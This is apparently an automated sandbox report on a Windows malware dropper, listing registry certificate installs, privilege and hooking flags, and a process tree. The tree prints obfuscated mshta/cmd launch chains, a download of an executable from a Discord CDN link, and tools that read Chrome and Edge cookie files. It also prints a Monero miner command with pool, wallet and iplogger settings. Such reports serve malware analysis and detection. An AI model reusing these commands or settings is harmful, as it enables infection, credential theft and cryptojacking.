| Set value (data) | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\SystemCertificates\CA\Certificates\8D4C4A23BA9EE84EA7348FA98CC6E65FBB69DE7B\Blob = (binary certificate blob omitted) | C:\Users\Admin\AppData\Local\Temp\is-SS4QK.tmp\Setup.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = (binary certificate blob omitted) | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA | C:\Users\Admin\AppData\Local\Temp\is-Q50BO.tmp\Setup.tmp | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA\Blob = (binary certificate blob omitted) | C:\Users\Admin\AppData\Local\Temp\is-Q50BO.tmp\Setup.tmp | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = (binary certificate blob omitted) | C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC | C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E | C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = (binary certificate blob omitted) | C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\SystemCertificates\CA\Certificates\8D4C4A23BA9EE84EA7348FA98CC6E65FBB69DE7B | C:\Users\Admin\AppData\Local\Temp\is-SS4QK.tmp\Setup.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = (binary certificate blob omitted) | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC | C:\Users\Admin\AppData\Local\Temp\is-Q50BO.tmp\Setup.tmp | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC\Blob = (binary certificate blob omitted) | C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Script User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Setup.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Setup.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\WDTkVNhFhmcoEMERJYQBQl7Q.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\WDTkVNhFhmcoEMERJYQBQl7Q.exe | N/A |
| N/A | N/A | N/A | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Documents\WDTkVNhFhmcoEMERJYQBQl7Q.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\mOwx1UOkucJxsBjOd3SFb_rP.exe | N/A |
| N/A | N/A | N/A | N/A |
Suspicious behavior: SetClipboardViewer
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\8237174.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\6253116.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Documents\t7OWSfKbq0NFTEXuLax48kcT.exe | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\4629710.exe | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Documents\ugle20q5ojkWW5kU8LWLcBJ8.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-JLJVJ.tmp\builder.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\A8C4.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\ZHYhIavsfxgIeCf6Z3BlV1bl.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\Setup.exe"
C:\Windows\System32\sihclient.exe
C:\Windows\System32\sihclient.exe /cv spk7Mq6mdk6K+NQLk1ou5Q.0.2
C:\Users\Admin\Documents\t7OWSfKbq0NFTEXuLax48kcT.exe
"C:\Users\Admin\Documents\t7OWSfKbq0NFTEXuLax48kcT.exe"
C:\Users\Admin\Documents\r0v38CBGa1HE7SlWs5A7ASfm.exe
"C:\Users\Admin\Documents\r0v38CBGa1HE7SlWs5A7ASfm.exe"
C:\Users\Admin\Documents\WDTkVNhFhmcoEMERJYQBQl7Q.exe
"C:\Users\Admin\Documents\WDTkVNhFhmcoEMERJYQBQl7Q.exe"
C:\Users\Admin\Documents\I09RwQv0rQtQjRrDBtVBhpJX.exe
"C:\Users\Admin\Documents\I09RwQv0rQtQjRrDBtVBhpJX.exe"
C:\Users\Admin\Documents\tA4XBm6IGRVUpYbhMVhLz8__.exe
"C:\Users\Admin\Documents\tA4XBm6IGRVUpYbhMVhLz8__.exe"
C:\Users\Admin\Documents\P54TayrSRCWbbcdY6GCag4b7.exe
"C:\Users\Admin\Documents\P54TayrSRCWbbcdY6GCag4b7.exe"
C:\Users\Admin\Documents\LQlkXepVr3q4X1m6pmAxdFwZ.exe
"C:\Users\Admin\Documents\LQlkXepVr3q4X1m6pmAxdFwZ.exe"
C:\Users\Admin\Documents\wshBWvHSW7E9Z5tpJBDL6bK9.exe
"C:\Users\Admin\Documents\wshBWvHSW7E9Z5tpJBDL6bK9.exe"
C:\Users\Admin\Documents\nV85MKdCM6UbmW1CLFfhV2SD.exe
"C:\Users\Admin\Documents\nV85MKdCM6UbmW1CLFfhV2SD.exe"
C:\Users\Admin\Documents\ugle20q5ojkWW5kU8LWLcBJ8.exe
"C:\Users\Admin\Documents\ugle20q5ojkWW5kU8LWLcBJ8.exe"
C:\Users\Admin\Documents\YoUqTbAnGXDdz5IYILTVMbIP.exe
"C:\Users\Admin\Documents\YoUqTbAnGXDdz5IYILTVMbIP.exe"
C:\Users\Admin\Documents\6eJYmeT9l2nkBLhdXpHIu5jX.exe
"C:\Users\Admin\Documents\6eJYmeT9l2nkBLhdXpHIu5jX.exe"
C:\Users\Admin\Documents\Cs2UBYKrVp_jXnxYnS5OkRRN.exe
"C:\Users\Admin\Documents\Cs2UBYKrVp_jXnxYnS5OkRRN.exe"
C:\Users\Admin\Documents\UqhaRd9yaOQ_tGP0e6IdT3Mz.exe
"C:\Users\Admin\Documents\UqhaRd9yaOQ_tGP0e6IdT3Mz.exe"
C:\Users\Admin\Documents\R_W8nY_SRCGM1xnY1EePovjK.exe
"C:\Users\Admin\Documents\R_W8nY_SRCGM1xnY1EePovjK.exe"
C:\Users\Admin\Documents\KuXpHUaLbM1TdWQ5WTxiUJ9E.exe
"C:\Users\Admin\Documents\KuXpHUaLbM1TdWQ5WTxiUJ9E.exe"
C:\Users\Admin\Documents\AhJPwrJS8kuvRpnEJKnRhIHz.exe
"C:\Users\Admin\Documents\AhJPwrJS8kuvRpnEJKnRhIHz.exe"
C:\Users\Admin\Documents\k_d_iWj41GGBlWEK8ASYxa3i.exe
"C:\Users\Admin\Documents\k_d_iWj41GGBlWEK8ASYxa3i.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\BBE3.tmp\BBE4.tmp\BBE5.bat C:\Users\Admin\Documents\tA4XBm6IGRVUpYbhMVhLz8__.exe"
C:\Users\Admin\Documents\sV1Jn1lT16wMLBIKSnWq35QV.exe
"C:\Users\Admin\Documents\sV1Jn1lT16wMLBIKSnWq35QV.exe"
C:\Users\Admin\Documents\M7ra4gQ14dQBpMxjqjuHmHYI.exe
"C:\Users\Admin\Documents\M7ra4gQ14dQBpMxjqjuHmHYI.exe"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBscrIpT: ClOsE (CrEaTeobjeCt ( "WsCRIPt.SHELl"). RUN( "cmD.EXe /C coPy /y ""C:\Users\Admin\Documents\R_W8nY_SRCGM1xnY1EePovjK.exe"" Z2bT94N_CMSE.Exe && START Z2Bt94N_cMSE.eXE -PMrvgB7ejl2YIjc3PC8aTZbo &IF """" == """" for %j iN (""C:\Users\Admin\Documents\R_W8nY_SRCGM1xnY1EePovjK.exe"" ) do taskkill -im ""%~NXj"" -f " , 0, tRue ) )
C:\Users\Admin\Documents\WDTkVNhFhmcoEMERJYQBQl7Q.exe
"C:\Users\Admin\Documents\WDTkVNhFhmcoEMERJYQBQl7Q.exe"
C:\Users\Admin\Documents\fphEOT1EWt2RJIwPlxup11t4.exe
"C:\Users\Admin\Documents\fphEOT1EWt2RJIwPlxup11t4.exe"
C:\Users\Admin\Documents\tAYT1FZs4zv8MCsehgIjSWm7.exe
"C:\Users\Admin\Documents\tAYT1FZs4zv8MCsehgIjSWm7.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C coPy /y "C:\Users\Admin\Documents\R_W8nY_SRCGM1xnY1EePovjK.exe" Z2bT94N_CMSE.Exe && START Z2Bt94N_cMSE.eXE -PMrvgB7ejl2YIjc3PC8aTZbo&IF "" == "" for %j iN ("C:\Users\Admin\Documents\R_W8nY_SRCGM1xnY1EePovjK.exe" ) do taskkill -im "%~NXj" -f
C:\Users\Admin\AppData\Local\Temp\BBE3.tmp\BBE4.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\BBE3.tmp\BBE4.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""
C:\Users\Admin\Documents\ucKGnlQzLW4NVL8nnw09GARf.exe
"C:\Users\Admin\Documents\ucKGnlQzLW4NVL8nnw09GARf.exe"
C:\Users\Admin\AppData\Local\Temp\Z2bT94N_CMSE.Exe
Z2Bt94N_cMSE.eXE -PMrvgB7ejl2YIjc3PC8aTZbo
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 1548 -ip 1548
C:\Users\Admin\AppData\Local\Temp\is-JTI35.tmp\ucKGnlQzLW4NVL8nnw09GARf.tmp
"C:\Users\Admin\AppData\Local\Temp\is-JTI35.tmp\ucKGnlQzLW4NVL8nnw09GARf.tmp" /SL5="$3026C,138429,56832,C:\Users\Admin\Documents\ucKGnlQzLW4NVL8nnw09GARf.exe"
C:\Users\Admin\Documents\uRay4026UiM7xMPbYxI6iz8R.exe
"C:\Users\Admin\Documents\uRay4026UiM7xMPbYxI6iz8R.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 2368 -ip 2368
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
C:\Users\Admin\Documents\AhJPwrJS8kuvRpnEJKnRhIHz.exe
C:\Users\Admin\Documents\AhJPwrJS8kuvRpnEJKnRhIHz.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 4724 -ip 4724
C:\Users\Admin\Documents\nV85MKdCM6UbmW1CLFfhV2SD.exe
C:\Users\Admin\Documents\nV85MKdCM6UbmW1CLFfhV2SD.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1548 -s 272
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBscrIpT: ClOsE (CrEaTeobjeCt ( "WsCRIPt.SHELl"). RUN( "cmD.EXe /C coPy /y ""C:\Users\Admin\AppData\Local\Temp\Z2bT94N_CMSE.Exe"" Z2bT94N_CMSE.Exe && START Z2Bt94N_cMSE.eXE -PMrvgB7ejl2YIjc3PC8aTZbo &IF ""-PMrvgB7ejl2YIjc3PC8aTZbo"" == """" for %j iN (""C:\Users\Admin\AppData\Local\Temp\Z2bT94N_CMSE.Exe"" ) do taskkill -im ""%~NXj"" -f " , 0, tRue ) )
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4724 -s 276
C:\Program Files (x86)\Company\NewProduct\customer3.exe
"C:\Program Files (x86)\Company\NewProduct\customer3.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2368 -s 312
C:\Windows\SysWOW64\taskkill.exe
taskkill -im "R_W8nY_SRCGM1xnY1EePovjK.exe" -f
C:\Users\Admin\Documents\M7ra4gQ14dQBpMxjqjuHmHYI.exe
"C:\Users\Admin\Documents\M7ra4gQ14dQBpMxjqjuHmHYI.exe" -q
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 1708 -ip 1708
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 640 -p 1452 -ip 1452
C:\Users\Admin\AppData\Roaming\4629710.exe
"C:\Users\Admin\AppData\Roaming\4629710.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 856 -ip 856
C:\Program Files (x86)\Company\NewProduct\jooyu.exe
"C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1708 -s 736
C:\Users\Admin\AppData\Local\Temp\BBE3.tmp\BBE4.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\BBE3.tmp\BBE4.tmp\extd.exe "/random" "9000000" "" "" "" "" "" "" ""
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C coPy /y "C:\Users\Admin\AppData\Local\Temp\Z2bT94N_CMSE.Exe" Z2bT94N_CMSE.Exe && START Z2Bt94N_cMSE.eXE -PMrvgB7ejl2YIjc3PC8aTZbo&IF "-PMrvgB7ejl2YIjc3PC8aTZbo" == "" for %j iN ("C:\Users\Admin\AppData\Local\Temp\Z2bT94N_CMSE.Exe" ) do taskkill -im "%~NXj" -f
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 648 -p 3180 -ip 3180
C:\Users\Admin\AppData\Roaming\8119797.exe
"C:\Users\Admin\AppData\Roaming\8119797.exe"
C:\Users\Admin\AppData\Roaming\5057999.exe
"C:\Users\Admin\AppData\Roaming\5057999.exe"
C:\Users\Admin\AppData\Roaming\8041802.exe
"C:\Users\Admin\AppData\Roaming\8041802.exe"
C:\Users\Admin\AppData\Local\Temp\BBE3.tmp\BBE4.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\BBE3.tmp\BBE4.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/879335227095416884/879627930865639475/DES6_6_6.exe" "DES6_6_6.exe" "" "" "" "" "" ""
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\28960\DES6_6_6.exe
DES6_6_6.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 640 -p 4244 -ip 4244
C:\Users\Admin\AppData\Local\Temp\BBE3.tmp\BBE4.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\BBE3.tmp\BBE4.tmp\extd.exe "/sleep" "9000009" "" "" "" "" "" "" ""
C:\Users\Admin\AppData\Local\Temp\is-QD05A.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-QD05A.tmp\Setup.exe" /Verysilent
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /DeleteCookiesWildcard "*.facebook.com"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4244 -s 276
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" .\HwWYSzK.F2,zgr
C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe
"C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe" /Verysilent
C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe
"C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe"
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe
"C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet
C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe
"C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
C:\Users\Admin\AppData\Local\Temp\is-96CCO.tmp\Stats.tmp
"C:\Users\Admin\AppData\Local\Temp\is-96CCO.tmp\Stats.tmp" /SL5="$50124,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe" /Verysilent
C:\Users\Admin\AppData\Local\Temp\is-8KHSO.tmp\Inlog.tmp
"C:\Users\Admin\AppData\Local\Temp\is-8KHSO.tmp\Inlog.tmp" /SL5="$30320,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe
"C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /DeleteCookiesWildcard "*.facebook.com"
C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe
"C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe
"C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
C:\Users\Admin\AppData\Local\Temp\is-40JC3.tmp\WEATHER Manager.tmp
"C:\Users\Admin\AppData\Local\Temp\is-40JC3.tmp\WEATHER Manager.tmp" /SL5="$103D8,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe
"C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"
C:\Users\Admin\AppData\Local\Temp\is-OH5HF.tmp\MediaBurner2.tmp
"C:\Users\Admin\AppData\Local\Temp\is-OH5HF.tmp\MediaBurner2.tmp" /SL5="$10410,506127,422400,C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe
"C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe"
C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe
"C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"
C:\Program Files (x86)\GameBox INC\GameBox\RuntimeBroker.exe
"C:\Program Files (x86)\GameBox INC\GameBox\RuntimeBroker.exe"
C:\Users\Admin\AppData\Local\Temp\is-E326R.tmp\VPN.tmp
"C:\Users\Admin\AppData\Local\Temp\is-E326R.tmp\VPN.tmp" /SL5="$1040E,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
"C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"
C:\Users\Admin\AppData\Local\Temp\22222.exe
C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\22222.exe
C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
C:\Users\Admin\AppData\Local\Temp\is-JLJVJ.tmp\builder.exe
"C:\Users\Admin\AppData\Local\Temp\is-JLJVJ.tmp\builder.exe" -algo'' -pool'stratum+tcp://xmr-asia1.nanopool.org:14444' -wallet'42Lm2CeGer8hubckgimBBXhKWRnZqtLx74Ye2HcyMyikARReDxWRn15Bia1k8qgnboPNxEZJHN5HgX8eNa1EP7xeA3X8Z7s' -load'50' -idleload'50' -loggerSa'2no.co' -loggerS'1C6Ua7' -loggerRa'iplogger.org' -loggerR'1cmAy7' -loggerWa'2no.co' -loggerW'' -ico'' -glue'' -error'' -worker'' -icrypt'' -sremoval'' -ntask'SystemCheck' -ptask'System\' -atask'Microsoft_Corporation' -dtask'Starts_a_system_diagnostics_application_to_scan_for_errors_and_performance_problems.' -pinstall'Roaming\Microsoft\Windows\' -ninstall'Helper' -sinstall'-SystemCheck'
C:\Users\Admin\AppData\Local\Temp\is-JJV0D.tmp\ultradumnibour.exe
"C:\Users\Admin\AppData\Local\Temp\is-JJV0D.tmp\ultradumnibour.exe" /S /UID=burnerch2
C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
"C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe" -q
C:\Users\Admin\AppData\Local\Temp\is-28PC5.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-28PC5.tmp\Setup.exe" /silent /subid=720
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 4748 -ip 4748
C:\Users\Admin\AppData\Local\Temp\is-Q50BO.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-Q50BO.tmp\Setup.tmp" /SL5="$202AC,15170975,270336,C:\Users\Admin\AppData\Local\Temp\is-28PC5.tmp\Setup.exe" /silent /subid=720
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 620 -p 4984 -ip 4984
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4748 -s 296
C:\Users\Admin\AppData\Local\Temp\22222.exe
C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Roaming\8760295.exe
"C:\Users\Admin\AppData\Roaming\8760295.exe"
C:\Users\Admin\AppData\Roaming\8237174.exe
"C:\Users\Admin\AppData\Roaming\8237174.exe"
C:\Users\Admin\AppData\Local\Temp\tmp6F93_tmp.exe
"C:\Users\Admin\AppData\Local\Temp\tmp6F93_tmp.exe"
C:\Users\Admin\AppData\Local\Temp\22222.exe
